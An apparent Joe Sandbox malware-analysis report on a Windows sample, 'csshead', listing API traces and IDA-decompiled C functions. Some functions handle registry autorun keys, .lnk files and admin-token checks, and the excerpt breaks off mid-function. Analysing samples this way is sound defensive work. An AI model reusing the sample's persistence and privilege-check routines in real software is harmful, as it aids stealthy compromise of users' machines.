Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D

Sleep.KERNEL32(000003E8), ref: 00408FC8
GetCursorPos.USER32(?), ref: 00409000

Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533

Part of subcall function 004038DC: RtlEnterCriticalSection.NTDLL(?), ref: 004038E3

Part of subcall function 004038EC: RtlLeaveCriticalSection.NTDLL(?), ref: 004038F3

Part of subcall function 00405640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
Part of subcall function 00405640: FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
Part of subcall function 00405640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
Part of subcall function 00405640: FindClose.KERNEL32(000000FF), ref: 0040583D

Part of subcall function 004084A4: Sleep.KERNEL32(00004E20), ref: 00408519
Part of subcall function 004084A4: GetTickCount.KERNEL32 ref: 004086EB
Part of subcall function 004084A4: Sleep.KERNEL32(00003A98), ref: 00408706
Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 00408879
Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 004088B6
Part of subcall function 004084A4: Sleep.KERNEL32(000003E8), ref: 0040895F

RtlExitUserThread.NTDLL(00000000), ref: 00409069

Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE

Strings

.lnk, xrefs: 00408E8A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00413840, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154windowstring

APIs

IsWindow.USER32(?), ref: 00413896
SendMessageA.USER32(?,?,?,?), ref: 004138AE
GetMenuItemCount.USER32 ref: 0041392A
GetVersionExA.KERNEL32(?), ref: 0041396B
GetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 0041399F
lstrlen.KERNEL32(?,?,00000000,00000001,0000002C), ref: 004139D2
SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 004139ED
GetMenuItemCount.USER32 ref: 00413A10

Strings

Z, xrefs: 00413983
,, xrefs: 0041398A
1, xrefs: 004139B7

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411630, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123
windowlibrary

C-Code - Quality: 90%

			E00411630(intOrPtr __ecx) {
				struct _OSVERSIONINFOA _v148;
				intOrPtr _v216;
				signed int _v240;
				intOrPtr _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				struct HWND__* _v272;
				struct HWND__* _v276;
				intOrPtr _v280;
				_Unknown_base(*)()* _t47;
				void* _t50;
				int _t51;
				struct HWND__* _t53;
				struct HWND__* _t61;
				void* _t62;
				struct HINSTANCE__* _t67;
				void* _t69;
				void* _t72;
				void* _t73;

				_t72 =  &_v280;
				_v280 = __ecx;
				_t61 = GetParent( *(__ecx + 4));
				_v272 = _t61;
				_t53 = SendMessageA(_t61, 0x40c, 0, 0);
				_t51 = 0;
				_v276 = _t53;
				if(_t53 <= 0) {
					return 0;
				} else {
					do {
						_t69 = 0x64;
						_v148.dwOSVersionInfoSize = 0x94;
						E00422840( &(_v148.dwMajorVersion), 0, 0x90);
						_t73 = _t72 + 0xc;
						if(GetVersionExA( &_v148) == 0 || _v148.dwMajorVersion < 6) {
							L12:
							_t69 = 0x50;
						} else {
							_v268 = 0;
							_v264 = 0;
							_v260 = 0;
							_v256 = 0;
							_v252 = 0;
							_v268 = 0x14;
							_t67 = LoadLibraryA("comctl32.dll");
							if(_t67 != 0) {
								_t47 = GetProcAddress(_t67, "DllGetVersion");
								if(_t47 != 0) {
									_t62 =  *_t47( &_v268);
								} else {
									_t62 = 0x80004001;
								}
								FreeLibrary(_t67);
								_t50 = _t62;
								_t61 = _v276;
							} else {
								_t50 = L00403AA0();
							}
							if(_t50 < 0 || _v268 < 6) {
								goto L12;
							}
						}
						_v248 = _t69;
						_v244 = 0x11;
						E00422840( &_v240, 0, 0x5c);
						_t72 = _t73 + 0xc;
						if(SendMessageA(_t61, 0x41d, _t51,  &_v248) == 0 || _v216 !=  *(_v280 + 4)) {
							goto L15;
						}
						if((_v240 & 0x00000200) == 0) {
							break;
						}
						PostMessageA(_t61, 0x42b, _t51, 0);
						PostMessageA( *(_v280 + 4), 0x100, 0x28, 0);
						return 1;
						goto L20;
						L15:
						_t51 = _t51 + 1;
					} while (_t51 < _v276);
					return 0;
				}
				L20:
			}

0x00411630
0x0041163c
0x0041164a
0x00411652
0x0041165c
0x00411660
0x00411662
0x00411668
0x0041177d
0x0041166e
0x00411670
0x0041167f
0x00411684
0x0041168f
0x00411694
0x004116a7
0x00411721
0x00411721
0x004116b3
0x004116b5
0x004116be
0x004116c2
0x004116c6
0x004116ca
0x004116ce
0x004116dc
0x004116e0
0x004116ef
0x004116f7
0x00411707
0x004116f9
0x004116f9
0x004116f9
0x0041170a
0x00411710
0x00411712
0x004116e2
0x004116e2
0x004116e2
0x00411718
0x00000000
0x00000000
0x00411718
0x0041172f
0x00411733
0x0041173b
0x00411740
0x00411757
0x00000000
0x00000000
0x00411786
0x00000000
0x00000000
0x00411797
0x004117aa
0x004117b8
0x00000000
0x00411766
0x00411766
0x00411767
0x00000000
0x00411774
0x00000000

APIs

GetParent.USER32(?), ref: 00411640
SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
GetVersionExA.KERNEL32(?), ref: 0041169F
LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
FreeLibrary.KERNEL32(00000000), ref: 0041170A

Part of subcall function 00403AA0: GetLastError.KERNEL32(00405D06), ref: 00403AA0

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA

Strings

comctl32.dll, xrefs: 004116B9
DllGetVersion, xrefs: 004116E9

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004080C0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
window

C-Code - Quality: 90%

			E004080C0(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t63;

				_v8 = __eax;
				if( *0x40a038 != 0) {
					_t50 =  *0x40a038; // 0x0
					 *0x40b4f8(_t50);
				}
				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x40a29c = 0xffffffff;
				_t13 =  *0x40c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x40c24c; // 0x0
				CloseHandle(_t15);
				E00401308( &_v265, 0x40b518);
				 *((char*)(_t63 + E004012DC(0x40b518) - 0x109)) = 0;
				E0040133C( &_v265, ".lnk");
				E0040471C( &_v265, 0, 0);
				E0040471C(0x40b518, 0x7530, 0xffffffff);
				if( *0x40a574 != 0) {
					_t48 =  *0x40a574; // 0x0
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x40a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0x40b752, _t60);
					}
					E00404A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x40a260; // 0x4021a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0x40b752, _t62);
					}
					E00404A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x40b510; // 0x0
				E00401828(_t31);
				_t33 =  *0x40a054; // 0x0
				ReleaseMutex(_t33);
				_t35 =  *0x40a054; // 0x0
				CloseHandle(_t35);
				_t37 =  *0x40a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}

0x004080c9
0x004080d3
0x004080d5
0x004080db
0x004080db
0x004080ef
0x004080f4
0x00408100
0x00408106
0x0040810c
0x00408112
0x00408123
0x00408132
0x00408146
0x00408158
0x0040816a
0x00408176
0x0040817e
0x00408184
0x00408184
0x00408191
0x004081d7
0x004081f0
0x004081fb
0x004081d9
0x004081de
0x004081e9
0x004081e9
0x0040820c
0x00408193
0x00408197
0x004081b0
0x004081bb
0x00408199
0x0040819e
0x004081a9
0x004081a9
0x004081cc
0x004081cc
0x00408211
0x00408216
0x0040821b
0x00408221
0x00408227
0x0040822d
0x00408233
0x0040823a
0x0040823c
0x00408240
0x00408244
0x00408244
0x0040824d

APIs

RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
CloseHandle.KERNEL32(00000000), ref: 00408112

Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
ExitProcess.KERNEL32 ref: 00408244

Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D

SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB

Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

ReleaseMutex.KERNEL32(00000000), ref: 00408221
CloseHandle.KERNEL32(00000000), ref: 0040822D

Strings

.lnk, xrefs: 0040813A

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0041F4A0, Relevance: 16.7, APIs: 11, Instructions: 158
window

C-Code - Quality: 63%

			E0041F4A0(void* __ecx, CHAR* _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
				CHAR* _v0;
				intOrPtr _v8;
				int _v12;
				char _v24;
				void* _v28;
				void* __ebp;
				struct HRSRC__* _t37;
				void* _t38;
				struct HINSTANCE__* _t43;
				struct HBITMAP__* _t44;
				int _t45;
				char _t53;
				signed int _t70;
				struct HINSTANCE__* _t82;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;

				_t95 =  *0x442b94; // 0x0
				_t100 = __ecx;
				_t37 = FindResourceA(_t95, _a4, 0xf1);
				if(_t37 != 0) {
					_t38 = LoadResource(_t95, _t37);
					if(_t38 == 0) {
						goto L1;
					} else {
						_t96 = LockResource(_t38);
						if(_t96 == 0) {
							goto L1;
						} else {
							_t70 =  *(_t96 + 6) & 0x0000ffff;
							E00404A00(_t100,  *(_t96 + 2) & 0x0000ffff,  *(_t96 + 4) & 0x0000ffff);
							if( *((intOrPtr*)(_t100 + 0x48)) != 0) {
								L6:
								_v8 =  *0x433034( *((intOrPtr*)(_t100 + 0x48)));
								_v12 = 0;
								if(_a4 == 0) {
									if(( *(_t100 + 0x85) & 0x00000020) == 0) {
										_t43 =  *0x442b94; // 0x0
										_t44 = LoadBitmapA(_t43, _v0);
										goto L11;
									} else {
										_t82 =  *0x442b94; // 0x0
										L0041E6B0( &_v12, LoadImageA(_t82, _v0, 0, 0, 0, 0x2040));
									}
								} else {
									_t94 =  *0x442b94; // 0x0
									_t44 =  *0x433044(_t94, _v0, _a8 & 0x0000ffff, _a12, _a16);
									L11:
									_v12 = _t44;
								}
								_t45 = _v12;
								if(_t45 == 0) {
									goto L22;
								} else {
									_push( *((intOrPtr*)(_t100 + 0xa0)));
									_push(_t45);
									_push( *((intOrPtr*)(_t100 + 0x48)));
									if( *0x433050() != 0xffffffff) {
										if(_t70 > 0) {
											_t99 = _t96 + 8;
											do {
												if( *_t99 != 0) {
													L00401350(_t100 + 0x4c, _t99);
												}
												_t99 = _t99 + 2;
												_t70 = _t70 - 1;
											} while (_t70 != 0);
										}
										_t97 =  *0x433034( *((intOrPtr*)(_t100 + 0x48)));
										if(_t97 ==  *((intOrPtr*)(_t100 + 0x50))) {
											if(E00410BB0() != 0) {
												_t53 = _v24;
												_push(_t97 - _t53);
												_push(_t53);
												L0041EE80(_t100);
											}
											DeleteObject(_v28);
											return 1;
										} else {
											DeleteObject(_v28);
											goto L22;
										}
									} else {
										L00411B80( &_v24);
										return 0;
									}
								}
							} else {
								 *(_t100 + 0x85) =  *(_t100 + 0x85) ^ (E0041E1F0(_a4) << 0x00000005 ^  *(_t100 + 0x85)) & 0x00000020;
								if(L0041E420(_t100,  *(_t96 + 6) & 0x0000ffff) == 0) {
									L22:
									return 0;
								} else {
									goto L6;
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x0041f4a9
0x0041f4b6
0x0041f4b8
0x0041f4c0
0x0041f4ce
0x0041f4d6
0x00000000
0x0041f4d8
0x0041f4df
0x0041f4e3
0x00000000
0x0041f4e5
0x0041f4ee
0x0041f4f7
0x0041f500
0x0041f534
0x0041f543
0x0041f547
0x0041f54f
0x0041f57d
0x0041f5ac
0x0041f5b3
0x00000000
0x0041f57f
0x0041f583
0x0041f5a1
0x0041f5a1
0x0041f551
0x0041f565
0x0041f56e
0x0041f5b9
0x0041f5b9
0x0041f5b9
0x0041f5bd
0x0041f5c3
0x00000000
0x0041f5c5
0x0041f5ce
0x0041f5cf
0x0041f5d0
0x0041f5da
0x0041f5f3
0x0041f5f5
0x0041f5f8
0x0041f5fc
0x0041f602
0x0041f602
0x0041f607
0x0041f60a
0x0041f60a
0x0041f5f8
0x0041f617
0x0041f61c
0x0041f63c
0x0041f63e
0x0041f644
0x0041f645
0x0041f648
0x0041f648
0x0041f652
0x0041f664
0x0041f61e
0x0041f623
0x00000000
0x0041f623
0x0041f5dc
0x0041f5e0
0x0041f5ee
0x0041f5ee
0x0041f5da
0x0041f502
0x0041f51a
0x0041f52e
0x0041f629
0x0041f632
0x00000000
0x00000000
0x00000000
0x0041f52e
0x0041f500
0x0041f4e3
0x0041f4c3
0x0041f4c3
0x0041f4c9
0x0041f4c9

APIs

FindResourceA.KERNEL32(00000000,?,000000F1), ref: 0041F4B8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?), ref: 0041F4CE
LockResource.KERNEL32(00000000,?,?,?,?), ref: 0041F4D9

Part of subcall function 00404A00: ImageList_GetImageCount.COMCTL32(?), ref: 00404A0B
Part of subcall function 00404A00: ImageList_Destroy.COMCTL32(?), ref: 00404A19

ImageList_GetImageCount.COMCTL32(00000000,00000000), ref: 0041F538
80000008.COMCTL32(00000000,?,?,?,?), ref: 0041F56E
LoadImageA.USER32(00000000,?,00000000,00000000,00000000,00002040), ref: 0041F596

Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3

LoadBitmapA.USER32(00000000,?), ref: 0041F5B3
ImageList_AddMasked.COMCTL32(00000000,00000000,?), ref: 0041F5D1
ImageList_GetImageCount.COMCTL32(00000000), ref: 0041F611
DeleteObject.GDI32(00000000), ref: 0041F623

Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6

DeleteObject.GDI32(00000000), ref: 0041F652

Part of subcall function 0041EE80: GetDC.USER32(00000000), ref: 0041EE8B
Part of subcall function 0041EE80: CreateCompatibleDC.GDI32(00000000), ref: 0041EE98
Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
Part of subcall function 0041EE80: ReleaseDC.USER32(00000000,00000000), ref: 0041EF85
Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
Part of subcall function 0041EE80: SetWindowLongA.USER32(00000000,000000FC,?), ref: 0041F01A

Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A

Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00000000,?,00000002), ref: 0041E200
Part of subcall function 0041E1F0: LoadResource.KERNEL32(00000000,00000000), ref: 0041E208
Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F

Part of subcall function 0041E420: ImageList_Create.COMCTL32(0041F52C,?,?,0041F52C,00000001), ref: 0041E452

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00416570, Relevance: 16.6, APIs: 11, Instructions: 122
windowthread

C-Code - Quality: 90%

			E00416570(void* __ecx, void* __eflags, int _a4, int _a8, long _a12, struct HHOOK__** _a16) {
				long _v0;
				void* __edi;
				void* __esi;
				struct HWND__* _t31;
				struct HWND__* _t32;
				long _t37;
				void* _t38;
				struct HHOOK__** _t46;
				struct HINSTANCE__* _t47;
				struct HHOOK__* _t48;
				intOrPtr* _t50;
				long _t52;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t67;
				struct HHOOK__** _t68;
				void* _t69;
				void* _t71;
				void* _t73;
				intOrPtr _t76;

				_t73 = __eflags;
				_t69 = __ecx;
				_v0 = CallWindowProcA( *(__ecx + 0x40),  *(__ecx + 4), _a4, _a8, _a12);
				L00415980(_t69, _t73);
				_t63 =  *(_t69 + 4);
				_t31 = GetParent( *(_t69 + 4));
				_t66 = _t31;
				_t32 = GetParent(_t31);
				if(_t32 == 0) {
					L2:
					E004124F0(_t69 + 0x5c, _t66);
					_t67 =  *0x433420;
					SendMessageA( *(_t69 + 4), 0x41e, 0x14, 0);
					SendMessageA( *(_t69 + 4), 0x430, 0, 0);
					EnterCriticalSection(0x442b64);
					_t76 =  *0x442a50; // 0x0
					if(_t76 != 0) {
						L5:
						_t37 = GetCurrentThreadId();
						_t59 =  *0x442a50; // 0x0
						_t52 = _t37;
						_a4 = _t52;
						_t38 = L00414220(_t59,  &_a4);
						_t78 = _t38;
						if(_t38 != 0) {
							_t20 = _t38 + 4;
							 *_t20 =  *((intOrPtr*)(_t38 + 4)) + 1;
							__eflags =  *_t20;
						} else {
							_push(8);
							_t46 = E00423911( &_a4, _t67, _t69, _t78);
							if(_t46 == 0) {
								_t68 = 0;
								__eflags = 0;
							} else {
								 *_t46 = 0;
								_t46[1] = 0;
								_t68 = _t46;
							}
							_t47 =  *0x442b90; // 0x0
							_a16 = _t68;
							_t48 = SetWindowsHookExA(3, 0x415b20, _t47, _t52);
							if(_t68 != 0) {
								_t81 = _t48;
								if(_t48 != 0) {
									 *_t68 = _t48;
									_t68[1] = 1;
									_t61 =  *0x442a50; // 0x0
									E00414170(_t61,  &_a8, _t81,  &_a8,  &_a12);
								}
							}
						}
						L14:
						LeaveCriticalSection(0x442b64);
						 *(_t69 + 0x85) =  *(_t69 + 0x85) ^ (GetWindowLongA( *(_t69 + 4), 0xffffffec) >> 0x00000016 << 0x00000006 ^  *(_t69 + 0x85)) & 0x00000040;
						return _v0;
					}
					_push(0xc);
					_t50 = E00423911(_t63, _t67, _t69, _t76);
					_t71 = _t71 + 4;
					if(_t50 == 0) {
						 *0x442a50 = 0;
						goto L14;
					} else {
						 *_t50 = 0;
						 *((intOrPtr*)(_t50 + 4)) = 0;
						 *((intOrPtr*)(_t50 + 8)) = 0;
						 *0x442a50 = _t50;
						goto L5;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t66 = _t32;
					_t32 = GetParent(_t32);
				} while (_t32 != 0);
				goto L2;
			}

0x00416570
0x0041657d
0x00416595
0x00416599
0x0041659e
0x004165a8
0x004165aa
0x004165ad
0x004165b3
0x004165be
0x004165c2
0x004165ca
0x004165d9
0x004165e6
0x004165ed
0x004165f3
0x004165f9
0x00416616
0x00416616
0x0041661c
0x00416626
0x00416629
0x0041662d
0x00416632
0x00416634
0x00416697
0x00416697
0x00416697
0x00416636
0x00416636
0x00416638
0x00416642
0x00416655
0x00416655
0x00416644
0x00416644
0x00416646
0x00416649
0x00416649
0x00416657
0x00416665
0x00416669
0x00416671
0x00416673
0x00416675
0x0041667b
0x00416682
0x00416689
0x00416690
0x00416690
0x00416675
0x00416671
0x0041669a
0x0041669f
0x004166c0
0x004166cd
0x004166cd
0x004165fb
0x004165fd
0x00416602
0x00416607
0x0041664d
0x00000000
0x00416609
0x00416609
0x0041660b
0x0041660e
0x00416611
0x00000000
0x00416611
0x00000000
0x00000000
0x00000000
0x004165b5
0x004165b5
0x004165b6
0x004165b8
0x004165ba
0x00000000

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D

Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
Part of subcall function 00415980: GetSystemMetrics.USER32(00000031), ref: 00415A10
Part of subcall function 00415980: GetSystemMetrics.USER32(00000032), ref: 00415A1A
Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9

GetParent.USER32(?), ref: 004165A8
GetParent.USER32(00000000), ref: 004165AD
GetParent.USER32(00000000), ref: 004165B8

Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E

SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
EnterCriticalSection.KERNEL32(00442B64), ref: 004165ED
GetCurrentThreadId.KERNEL32 ref: 00416616

Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270

GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

SetWindowsHookExA.USER32(00000003,Function_00015B20,00000000,00000000), ref: 00416669
LeaveCriticalSection.KERNEL32(00442B64), ref: 0041669F

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00405CB0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 261
string

C-Code - Quality: 83%

			E00405CB0(struct HINSTANCE__* _a4, WCHAR* _a8, CHAR** _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				char _v16;
				char _v18;
				char _v288;
				void* _v300;
				void* __edi;
				intOrPtr* _t49;
				char _t53;
				CHAR* _t57;
				void* _t60;
				CHAR* _t63;
				char _t66;
				CHAR* _t74;
				void* _t75;
				CHAR* _t79;
				CHAR* _t82;
				CHAR* _t87;
				void* _t88;
				int _t90;
				CHAR* _t94;
				void* _t99;
				char _t104;
				intOrPtr* _t111;
				char _t118;
				void* _t124;
				long _t139;
				CHAR* _t141;
				WCHAR* _t148;
				CHAR* _t152;
				CHAR* _t157;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t170;
				void* _t171;
				void* _t172;

				_t111 = _a12;
				_t163 = _t162 - 0x11c;
				if(_t111 == 0) {
					L37:
					return 0x80004003;
				} else {
					_t49 = _a16;
					if(_t49 == 0) {
						goto L37;
					} else {
						 *_t111 = 0;
						 *_t49 = 0;
						_v8 = 0;
						_t139 = GetModuleFileNameA(_a4,  &_v288, 0x104);
						if(_t139 != 0) {
							__eflags = _t139 - 0x104;
							if(_t139 != 0x104) {
								_t53 = L00404410( &_v288);
								_t148 = _a8;
								_t104 = _t53;
								_v16 = _t104;
								__eflags = _t148;
								if(_t148 == 0) {
									L18:
									_a4 = lstrlenA( &_v288) + 1;
									_t57 = E004036F0( &_a4, lstrlenA( &_v288) + 1, 2);
									_t165 = _t163 + 0xc;
									__eflags = _t57;
									if(_t57 < 0) {
										goto L13;
									} else {
										_t150 = _a4;
										__eflags = _a4 - 0x400;
										if(__eflags > 0) {
											L23:
											_t60 = L00405440( &_v8, _t139, _t150);
										} else {
											_t82 = L00404C30( &_v288, __eflags, _t150);
											_t165 = _t165 + 4;
											__eflags = _t82;
											if(_t82 == 0) {
												goto L23;
											} else {
												L00422450(_t150);
												_t60 = _t165;
											}
										}
										_t152 = E00401810(_t60,  &_v288, _t150 >> 1, 3);
										__eflags = _t152;
										if(_t152 == 0) {
											goto L13;
										} else {
											_t141 =  *0x4332e0(_t152, _a16);
											__eflags = _t141;
											if(_t141 >= 0) {
												L34:
												_t63 =  *0x4332f0(_t152);
												 *_a12 = _t63;
												__eflags = _t63;
												if(_t63 == 0) {
													_t141 = 0x8007000e;
												}
												goto L36;
											} else {
												_t66 = ".tlb"; // 0x626c742e
												_t118 =  *0x4359ac; // 0x0
												_v16 = _t66;
												_v12 = _t118;
												__eflags = _t104 -  &_v288 + 5 - 0x104;
												if(__eflags > 0) {
													goto L22;
												} else {
													_t134 =  &_v18 - _t104;
													L00403790(__eflags, _t104,  &_v18 - _t104,  &_v16);
													_a4 = lstrlenA( &_v288) + 1;
													_t74 = E004036F0( &_a4, lstrlenA( &_v288) + 1, 2);
													_t170 = _t165 + 0x18;
													__eflags = _t74;
													if(_t74 < 0) {
														goto L13;
													} else {
														_t155 = _a4;
														__eflags = _a4 - 0x400;
														if(__eflags > 0) {
															L31:
															_t75 = L00405440( &_v8, _t141, _t155);
														} else {
															_t79 = L00404C30(_t134, __eflags, _t155);
															_t171 = _t170 + 4;
															__eflags = _t79;
															if(_t79 == 0) {
																goto L31;
															} else {
																L00422450(_t155);
																_t75 = _t171;
															}
														}
														_t152 = E00401810(_t75,  &_v288, _t155 >> 1, 3);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L13;
														} else {
